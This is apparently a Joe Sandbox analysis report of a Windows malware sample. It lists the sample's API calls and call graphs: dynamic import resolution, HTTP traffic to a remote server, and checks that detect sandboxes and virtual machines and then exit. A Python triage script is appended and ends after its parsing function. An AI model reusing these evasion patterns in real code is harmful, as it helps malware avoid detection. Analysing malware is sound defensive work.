27379 3afcb8 StrCmpCA 27379->27333 27379->27384 27380->27320 27380->27321 27380->27322 27380->27323 27380->27324 27380->27325 27380->27327 27380->27329 27380->27330 27380->27333 27380->27334 27380->27342 27380->27347 27380->27350 27380->27352 27380->27357 27380->27359 27380->27360 27380->27362 27380->27366 27380->27371 27380->27374 27380->27377 27380->27384 27381 3af9cb lstrcpy 27381->27384 27382 3afce9 lstrcpy 27382->27384 
27383 3aee90 28 API calls 27383->27384 27384->27326 27384->27328 27384->27329 27384->27333 27384->27336 27384->27337 27384->27367 27384->27369 27384->27375 27384->27376 27384->27378 27384->27379 27384->27380 27384->27381 27384->27382 27384->27383 27385 3afa19 lstrcpy 27384->27385 27386 3afd3a lstrcpy 27384->27386 27385->27384 27386->27384 27387->26411 27389 3b278c GetVolumeInformationA 27388->27389 27390 3b2785 27388->27390 27391 3b27ec GetProcessHeap RtlAllocateHeap 27389->27391 27390->27389 27393 3b2826 wsprintfA 27391->27393 27394 3b2822 27391->27394 27393->27394 27611 3b71e0 27394->27611 27398 394c70 27397->27398 27399 394c85 27398->27399 27400 394c7d lstrcpy 27398->27400 27615 394bc0 27399->27615 27400->27399 27402 394c90 27403 394ccc lstrcpy 27402->27403 27404 394cd8 27402->27404 27403->27404 27405 394cff lstrcpy 27404->27405 27406 394d0b 27404->27406 27405->27406 27407 394d2f lstrcpy 27406->27407 27408 394d3b 27406->27408 27407->27408 27409 394d6d lstrcpy 27408->27409 27410 394d79 27408->27410 27409->27410 27411 394dac InternetOpenA StrCmpCA 27410->27411 27412 394da0 lstrcpy 27410->27412 27413 394de0 27411->27413 27412->27411 27414 3954b8 InternetCloseHandle CryptStringToBinaryA 27413->27414 27619 3b3e70 27413->27619 27415 3954e8 LocalAlloc 27414->27415 27432 3955d8 27414->27432 27417 3954ff CryptStringToBinaryA 27415->27417 27415->27432 27418 395529 lstrlen 27417->27418 27419 395517 LocalFree 27417->27419 27420 39553d 27418->27420 27419->27432 27422 395563 lstrlen 27420->27422 27423 395557 lstrcpy 27420->27423 27421 394dfa 27424 394e23 lstrcpy lstrcat 27421->27424 27425 394e38 27421->27425 27427 39557d 27422->27427 27423->27422 27424->27425 27426 394e5a lstrcpy 27425->27426 27428 394e62 27425->27428 27426->27428 27429 39558f lstrcpy lstrcat 27427->27429 27430 3955a2 27427->27430 27431 394e71 lstrlen 27428->27431 27429->27430 27433 3955d1 27430->27433 27435 3955c9 lstrcpy 27430->27435 27434 394e89 27431->27434 27432->26440 27433->27432 27436 394e95 lstrcpy 
lstrcat 27434->27436 27437 394eac 27434->27437 27435->27433 27436->27437 27438 394ed5 27437->27438 27439 394ecd lstrcpy 27437->27439 27440 394edc lstrlen 27438->27440 27439->27438 27441 394ef2 27440->27441 27442 394efe lstrcpy lstrcat 27441->27442 27443 394f15 27441->27443 27442->27443 27444 394f36 lstrcpy 27443->27444 27445 394f3e 27443->27445 27444->27445 27446 394f65 lstrcpy lstrcat 27445->27446 27447 394f7b 27445->27447 27446->27447 27448 394fa4 27447->27448 27449 394f9c lstrcpy 27447->27449 27450 394fab lstrlen 27448->27450 27449->27448 27451 394fc1 27450->27451 27452 394fcd lstrcpy lstrcat 27451->27452 27453 394fe4 27451->27453 27452->27453 27454 39500d 27453->27454 27455 395005 lstrcpy 27453->27455 27456 395014 lstrlen 27454->27456 27455->27454 27457 39502a 27456->27457 27458 395036 lstrcpy lstrcat 27457->27458 27459 39504d 27457->27459 27458->27459 27460 395079 27459->27460 27461 395071 lstrcpy 27459->27461 27462 395080 lstrlen 27460->27462 27461->27460 27463 39509b 27462->27463 27464 3950ac lstrcpy lstrcat 27463->27464 27465 3950bc 27463->27465 27464->27465 27466 3950da lstrcpy lstrcat 27465->27466 27467 3950ed 27465->27467 27466->27467 27468 39510b lstrcpy 27467->27468 27469 395113 27467->27469 27468->27469 27470 395121 InternetConnectA 27469->27470 27470->27414 27471 395150 HttpOpenRequestA 27470->27471 27472 39518b 27471->27472 27473 3954b1 InternetCloseHandle 27471->27473 27626 3b7310 lstrlen 27472->27626 27473->27414 27477 3951a4 27634 3b72c0 27477->27634 27480 3b7280 lstrcpy 27481 3951c0 27480->27481 27482 3b7310 3 API calls 27481->27482 27483 3951d5 27482->27483 27484 3b7280 lstrcpy 27483->27484 27485 3951de 27484->27485 27486 3b7310 3 API calls 27485->27486 27487 3951f4 27486->27487 27488 3b7280 lstrcpy 27487->27488 27489 3951fd 27488->27489 27490 3b7310 3 API calls 27489->27490 27491 395213 27490->27491 27492 3b7280 lstrcpy 27491->27492 27493 39521c 27492->27493 27494 3b7310 3 API calls 27493->27494 27495 395231 27494->27495 27496 3b7280 lstrcpy 
27495->27496 27497 39523a 27496->27497 27498 3b72c0 2 API calls 27497->27498 27499 39524d 27498->27499 27500 3b7280 lstrcpy 27499->27500 27501 395256 27500->27501 27502 3b7310 3 API calls 27501->27502 27503 39526b 27502->27503 27504 3b7280 lstrcpy 27503->27504 27505 395274 27504->27505 27506 3b7310 3 API calls 27505->27506 27507 395289 27506->27507 27508 3b7280 lstrcpy 27507->27508 27509 395292 27508->27509 27510 3b72c0 2 API calls 27509->27510 27511 3952a5 27510->27511 27512 3b7280 lstrcpy 27511->27512 27513 3952ae 27512->27513 27514 3b7310 3 API calls 27513->27514 27515 3952c3 27514->27515 27516 3b7280 lstrcpy 27515->27516 27517 3952cc 27516->27517 27518 3b7310 3 API calls 27517->27518 27519 3952e2 27518->27519 27520 3b7280 lstrcpy 27519->27520 27521 3952eb 27520->27521 27522 3b7310 3 API calls 27521->27522 27523 395301 27522->27523 27524 3b7280 lstrcpy 27523->27524 27525 39530a 27524->27525 27526 3b7310 3 API calls 27525->27526 27527 39531f 27526->27527 27528 3b7280 lstrcpy 27527->27528 27529 395328 27528->27529 27530 3b72c0 2 API calls 27529->27530 27531 39533b 27530->27531 27532 3b7280 lstrcpy 27531->27532 27533 395344 27532->27533 27534 39537c 27533->27534 27535 395370 lstrcpy 27533->27535 27536 3b72c0 2 API calls 27534->27536 27535->27534 27537 39538a 27536->27537 27538 3b72c0 2 API calls 27537->27538 27539 395397 27538->27539 27540 3b7280 lstrcpy 27539->27540 27541 3953a1 27540->27541 27542 3953b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27541->27542 27543 39549c InternetCloseHandle 27542->27543 27547 3953f2 27542->27547 27545 3954ae 27543->27545 27544 3953fd lstrlen 27544->27547 27545->27473 27546 39542e lstrcpy lstrcat 27546->27547 27547->27543 27547->27544 27547->27546 27548 395473 27547->27548 27549 39546b lstrcpy 27547->27549 27550 39547a InternetReadFile 27548->27550 27549->27548 27550->27543 27550->27547 27552 3a8cc6 ExitProcess 27551->27552 27567 3a8ccd 27551->27567 27553 3a8ee2 27553->26442 27554 3a8d5a lstrlen 27554->27567 27555 3a8dbd 
StrCmpCA 27555->27567 27556 3a8ddd StrCmpCA 27556->27567 27557 3a8dfd StrCmpCA 27557->27567 27558 3a8e1d StrCmpCA 27558->27567 27559 3a8e3d StrCmpCA 27559->27567 27560 3a8d30 lstrlen 27560->27567 27561 3a8e56 StrCmpCA 27561->27567 27562 3a8e88 lstrlen 27562->27567 27563 3a8e6f StrCmpCA 27563->27567 27564 3a8d06 lstrlen 27564->27567 27565 3a8d84 StrCmpCA 27565->27567 27566 3a8da4 StrCmpCA 27566->27567 27567->27553 27567->27554 27567->27555 27567->27556 27567->27557 27567->27558 27567->27559 27567->27560 27567->27561 27567->27562 27567->27563 27567->27564 27567->27565 27567->27566 27568 3a8ebb lstrcpy 27567->27568 27568->27567 27569->26448 27570->26450 27571->26456 27572->26458 27573->26464 27574->26466 27575->26472 27576->26476 27577->26482 27578->26484 27579->26488 27580->26502 27581->26506 27582->26505 27583->26501 27584->26505 27585->26520 27586->26508 27587->26509 27588->26513 27589->26516 27590->26522 27591->26528 27592->26531 27593->26538 27594->26559 27595->26563 27596->26562 27597->26558 27598->26562 27599->26572 27602 39161f 27601->27602 27603 39162b lstrcpy 27602->27603 27604 391633 27602->27604 27603->27604 27605 39164d lstrcpy 27604->27605 27606 391655 27604->27606 27605->27606 27607 39166f lstrcpy 27606->27607 27609 391677 27606->27609 27607->27609 27608 391699 27608->27294 27609->27608 27610 391691 lstrcpy 27609->27610 27610->27608 27612 3b71e6 27611->27612 27613 3b71fc lstrcpy 27612->27613 27614 3b2860 27612->27614 27613->27614 27614->26437 27616 394bd0 27615->27616 27616->27616 27617 394bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27616->27617 27618 394c41 27617->27618 27618->27402 27620 3b3e83 27619->27620 27621 3b3e9f lstrcpy 27620->27621 27622 3b3eab 27620->27622 27621->27622 27623 3b3ecd lstrcpy 27622->27623 27624 3b3ed5 GetSystemTime 27622->27624 27623->27624 27625 3b3ef3 27624->27625 27625->27421 27627 3b732d 27626->27627 27628 39519b 27627->27628 27629 3b733d lstrcpy lstrcat 27627->27629 27630 3b7280 27628->27630 27629->27628 
27631 3b728c 27630->27631 27632 3b72b4 27631->27632 27633 3b72ac lstrcpy 27631->27633 27632->27477 27633->27632 27635 3b72dc 27634->27635 27636 3951b7 27635->27636 27637 3b72ed lstrcpy lstrcat 27635->27637 27636->27480 27637->27636 27665 3b31f0 GetSystemInfo wsprintfA 27644 3a4c77 295 API calls 27645 395869 57 API calls 27670 3a1269 408 API calls 27660 3b2d60 11 API calls 27682 3b2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27661 3a3959 244 API calls 27666 3a01d9 126 API calls 27646 3b2853 lstrcpy 27656 3b2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27690 3a8615 48 API calls 27647 3ae049 147 API calls 27657 3b3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27691 3b33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27683 3a8615 49 API calls
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00394C7F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394CD2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D05
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D35
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D73
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00394DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                                • Instruction ID: 1577b475884d1180d8ce6cf3c0527ba31dd9376c58f8dc0b82914a47cd3aba3c
                                • Opcode Fuzzy Hash: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                                • Instruction Fuzzy Hash: 06524B32911A16AFDF23EBA4DC49EAF77B9AF54300F194424F905AB251DB30ED46CB90

                                 Control-flow Graph (basic blocks with the API calls they contain and their successor edges; the executed / not-executed colouring of the original graphic is not preserved in text)

                                 • 2125: 3b6390-3b63bd GetPEB -> 2126, 2127
                                 • 2126: 3b65c3-3b6623 LoadLibraryA * 5 -> 2129, 2130
                                 • 2127: 3b63c3-3b65be call 3b62f0, GetProcAddress * 20 -> 2126
                                 • 2129: 3b6638-3b663f -> 2132, 2133
                                 • 2130: 3b6625-3b6633 GetProcAddress -> 2129
                                 • 2132: 3b666c-3b6673 -> 2134, 2135
                                 • 2133: 3b6641-3b6667 GetProcAddress * 2 -> 2132
                                 • 2134: 3b6688-3b668f -> 2136, 2137
                                 • 2135: 3b6675-3b6683 GetProcAddress -> 2134
                                 • 2136: 3b6691-3b669f GetProcAddress -> 2137
                                 • 2137: 3b66a4-3b66ab -> 2139, 2140
                                 • 2139: 3b66ad-3b66d2 GetProcAddress * 2 -> 2140
                                 • 2140: 3b66d7-3b66da (return)
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F71740), ref: 003B63E9
                                • GetProcAddress.KERNEL32(76210000,00F71680), ref: 003B6402
                                • GetProcAddress.KERNEL32(76210000,00F71548), ref: 003B641A
                                • GetProcAddress.KERNEL32(76210000,00F71560), ref: 003B6432
                                • GetProcAddress.KERNEL32(76210000,00F789A8), ref: 003B644B
                                • GetProcAddress.KERNEL32(76210000,00F65588), ref: 003B6463
                                • GetProcAddress.KERNEL32(76210000,00F655C8), ref: 003B647B
                                • GetProcAddress.KERNEL32(76210000,00F717A0), ref: 003B6494
                                • GetProcAddress.KERNEL32(76210000,00F71650), ref: 003B64AC
                                • GetProcAddress.KERNEL32(76210000,00F715F0), ref: 003B64C4
                                • GetProcAddress.KERNEL32(76210000,00F71758), ref: 003B64DD
                                • GetProcAddress.KERNEL32(76210000,00F65408), ref: 003B64F5
                                • GetProcAddress.KERNEL32(76210000,00F71788), ref: 003B650D
                                • GetProcAddress.KERNEL32(76210000,00F715A8), ref: 003B6526
                                • GetProcAddress.KERNEL32(76210000,00F655E8), ref: 003B653E
                                • GetProcAddress.KERNEL32(76210000,00F715C0), ref: 003B6556
                                • GetProcAddress.KERNEL32(76210000,00F715D8), ref: 003B656F
                                • GetProcAddress.KERNEL32(76210000,00F65548), ref: 003B6587
                                • GetProcAddress.KERNEL32(76210000,00F71800), ref: 003B659F
                                • GetProcAddress.KERNEL32(76210000,00F65348), ref: 003B65B8
                                • LoadLibraryA.KERNEL32(00F71818,?,?,?,003B1C03), ref: 003B65C9
                                • LoadLibraryA.KERNEL32(00F71830,?,?,?,003B1C03), ref: 003B65DB
                                • LoadLibraryA.KERNEL32(00F71848,?,?,?,003B1C03), ref: 003B65ED
                                • LoadLibraryA.KERNEL32(00F717E8,?,?,?,003B1C03), ref: 003B65FE
                                • LoadLibraryA.KERNEL32(00F71860,?,?,?,003B1C03), ref: 003B6610
                                • GetProcAddress.KERNEL32(75B30000,00F71878), ref: 003B662D
                                • GetProcAddress.KERNEL32(751E0000,00F71890), ref: 003B6649
                                • GetProcAddress.KERNEL32(751E0000,00F718A8), ref: 003B6661
                                • GetProcAddress.KERNEL32(76910000,00F78F50), ref: 003B667D
                                • GetProcAddress.KERNEL32(75670000,00F654E8), ref: 003B6699
                                • GetProcAddress.KERNEL32(77310000,00F788C8), ref: 003B66B5
                                • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003B66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 003B66C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                                • Instruction ID: d708d6ba7dff03dd57e4a600e5e8ee6aabadb9cb64b0f01ebcf9bb4457367e27
                                • Opcode Fuzzy Hash: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                                • Instruction Fuzzy Hash: 5DA15DB5A11A00DFD754DF64EC8CE263BB9F7A8740304851AE956E3360EB34A808FB60

                                 Control-flow Graph (basic blocks with the API calls they contain and their successor edges; the executed / not-executed colouring of the original graphic is not preserved in text)

                                 • 2141: 3b1bf0-3b1c0b call 392a90, call 3b6390 -> 2146, 2147
                                 • 2146: 3b1c1a-3b1c27 call 392930 -> 2151, 2152
                                 • 2147: 3b1c0d -> 2149
                                 • 2149: 3b1c10-3b1c18 -> 2146, 2149 (loop)
                                 • 2151: 3b1c29-3b1c2f lstrcpy -> 2152
                                 • 2152: 3b1c35-3b1c63 -> 2156, 2157
                                 • 2156: 3b1c6d-3b1c7b GetSystemInfo -> 2158, 2159
                                 • 2157: 3b1c65-3b1c67 ExitProcess
                                 • 2158: 3b1c7d-3b1c7f ExitProcess
                                 • 2159: 3b1c85-3b1ca0 call 391030, call 3910c0, GetUserDefaultLangID -> 2164, 2165
                                 • 2164: 3b1cb8-3b1cca call 3b2ad0, call 3b3e10 -> 2171, 2172
                                 • 2165: 3b1ca2-3b1ca9 -> 2164, 2166
                                 • 2166: 3b1cb0-3b1cb2 ExitProcess
                                 • 2171: 3b1ccc-3b1cde call 3b2a40, call 3b3e10 -> 2172, 2185
                                 • 2172: 3b1ce7-3b1d06 lstrlen, call 392930 -> 2177, 2178
                                 • 2177: 3b1d08-3b1d0d -> 2178, 2180
                                 • 2178: 3b1d23-3b1d40 lstrlen, call 392930 -> 2186, 2187
                                 • 2180: 3b1d0f-3b1d11 -> 2178, 2183
                                 • 2183: 3b1d13-3b1d1d lstrcpy, lstrcat -> 2178
                                 • 2185: 3b1ce0-3b1ce1 ExitProcess
                                 • 2186: 3b1d5a-3b1d7b call 3b2ad0, lstrlen, call 392930 -> 2193, 2194
                                 • 2187: 3b1d42-3b1d44 -> 2186, 2188
                                 • 2188: 3b1d46-3b1d54 lstrcpy, lstrcat -> 2186
                                 • 2193: 3b1d9a-3b1db4 lstrlen, call 392930 -> 2199, 2200
                                 • 2194: 3b1d7d-3b1d7f -> 2193, 2195
                                 • 2195: 3b1d81-3b1d85 -> 2193, 2197
                                 • 2197: 3b1d87-3b1d94 lstrcpy, lstrcat -> 2193
                                 • 2199: 3b1dce-3b1deb call 3b2a40, lstrlen, call 392930 -> 2206, 2207
                                 • 2200: 3b1db6-3b1db8 -> 2199, 2201
                                 • 2201: 3b1dba-3b1dc8 lstrcpy, lstrcat -> 2199
                                 • 2206: 3b1e0a-3b1e0f -> 2208, 2209
                                 • 2207: 3b1ded-3b1def -> 2206, 2210
                                 • 2208: 3b1e11 call 392a20 -> 2209
                                 • 2209: 3b1e16-3b1e22 call 392930 -> 2215, 2216
                                 • 2210: 3b1df1-3b1df5 -> 2206, 2213
                                 • 2213: 3b1df7-3b1e04 lstrcpy, lstrcat -> 2206
                                 • 2215: 3b1e30-3b1e66 call 392a20 * 5, OpenEventA -> 2228, 2229
                                 • 2216: 3b1e24-3b1e26 -> 2215, 2217
                                 • 2217: 3b1e28-3b1e2a lstrcpy -> 2215
                                 • 2228: 3b1e68-3b1e8a CloseHandle, Sleep, OpenEventA -> 2228 (loop), 2229
                                 • 2229: 3b1e8c-3b1ea0 CreateEventA, call 3b1b20, call 3affd0 -> 2233
                                 • 2233: 3b1ea5-3b1eae CloseHandle, ExitProcess
                                APIs
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71740), ref: 003B63E9
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71680), ref: 003B6402
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71548), ref: 003B641A
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71560), ref: 003B6432
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F789A8), ref: 003B644B
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F65588), ref: 003B6463
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F655C8), ref: 003B647B
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F717A0), ref: 003B6494
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71650), ref: 003B64AC
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F715F0), ref: 003B64C4
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71758), ref: 003B64DD
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F65408), ref: 003B64F5
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71788), ref: 003B650D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B1C2F
                                • ExitProcess.KERNEL32 ref: 003B1C67
                                • GetSystemInfo.KERNEL32(?), ref: 003B1C71
                                • ExitProcess.KERNEL32 ref: 003B1C7F
                                  • Part of subcall function 00391030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                  • Part of subcall function 00391030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                  • Part of subcall function 00391030: ExitProcess.KERNEL32 ref: 00391058
                                  • Part of subcall function 003910C0: GlobalMemoryStatusEx.KERNEL32 ref: 003910EA
                                  • Part of subcall function 003910C0: ExitProcess.KERNEL32 ref: 00391114
                                • GetUserDefaultLangID.KERNEL32 ref: 003B1C8F
                                • ExitProcess.KERNEL32 ref: 003B1CB2
                                • ExitProcess.KERNEL32 ref: 003B1CE1
                                • lstrlen.KERNEL32(00F78A18), ref: 003B1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1D15
                                • lstrcat.KERNEL32(00000000,00F78A18), ref: 003B1D1D
                                • lstrlen.KERNEL32(003C4B98), ref: 003B1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D48
                                • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1D54
                                • lstrlen.KERNEL32(00000000), ref: 003B1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1D94
                                • lstrlen.KERNEL32(003C4B98), ref: 003B1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DBC
                                • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1DC8
                                • lstrlen.KERNEL32(00000000), ref: 003B1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1E04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                                • Instruction ID: 18b11a7b9db51c08c13bcce16dd41c21157b242566a7026faa6985082c7abb0f
                                • Opcode Fuzzy Hash: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                                • Instruction Fuzzy Hash: 2371A131501A16AFDB22ABB0DC5DFBF7A79AF60705F450028FA06AA591DF30DD05DB60
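The two listings above are the raw material for triage: function 003B6390 (and the larger 003B66E0 below it) builds the sample's import table at run time with LoadLibraryA/GetProcAddress, while 003B1BF0 strings together environment probes (GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx, GetUserDefaultLangID), each with an ExitProcess immediately behind it. The following Python script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses "APIs" listing lines in the format the report prints, de-duplicates call sites that appear both in their own function and as "Part of subcall" under a caller, groups GetProcAddress calls by the module handle in their first argument, and flags every probe that is directly followed by ExitProcess within the same function. The sample input is constructed from lines on this page; the PROBE_APIS set is an assumption chosen to match the checks listed here, not a list defined by the report.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied from the "APIs" listings of functions
# 003B6390 and 003B1BF0 on this page, in the report's own rendering
# (leading bullet, optional "Part of subcall function" prefix).
SAMPLE_TRACE = """\
• GetProcAddress.KERNEL32(76210000,00F71740), ref: 003B63E9
• GetProcAddress.KERNEL32(76210000,00F71680), ref: 003B6402
• LoadLibraryA.KERNEL32(00F71818,?,?,?,003B1C03), ref: 003B65C9
• GetProcAddress.KERNEL32(75B30000,00F71878), ref: 003B662D
• GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003B66CC
  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71740), ref: 003B63E9
• lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B1C2F
• ExitProcess.KERNEL32 ref: 003B1C67
• GetSystemInfo.KERNEL32(?), ref: 003B1C71
• ExitProcess.KERNEL32 ref: 003B1C7F
  • Part of subcall function 00391030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
  • Part of subcall function 00391030: ExitProcess.KERNEL32 ref: 00391058
  • Part of subcall function 003910C0: GlobalMemoryStatusEx.KERNEL32 ref: 003910EA
  • Part of subcall function 003910C0: ExitProcess.KERNEL32 ref: 00391114
• GetUserDefaultLangID.KERNEL32 ref: 003B1C8F
• ExitProcess.KERNEL32 ref: 003B1CB2
"""

# One report line: optional subcall prefix, API.MODULE, optional (args), "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Environment probes that this page lists directly before ExitProcess in
# 003B1BF0 and its subcalls. Assumption: chosen to match this page, not a
# list defined by Joe Sandbox or by the sample.
PROBE_APIS = {"GetSystemInfo", "VirtualAllocExNuma", "GlobalMemoryStatusEx", "GetUserDefaultLangID"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: int                # address of the call site
    subcall: Optional[int]  # owning function when listed as "Part of subcall", else None


def parse_trace(text: str) -> list[ApiCall]:
    """Parse report lines into ApiCall records in listing order.

    A call site listed twice (in its own function and again as "Part of
    subcall" under a caller) is kept only the first time, keyed on ref.
    """
    calls: list[ApiCall] = []
    seen: set[int] = set()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers such as "APIs"/"Strings" or bullets that are not calls
        ref = int(m["ref"], 16)
        if ref in seen:
            continue
        seen.add(ref)
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["module"], args, ref, sub))
    return calls


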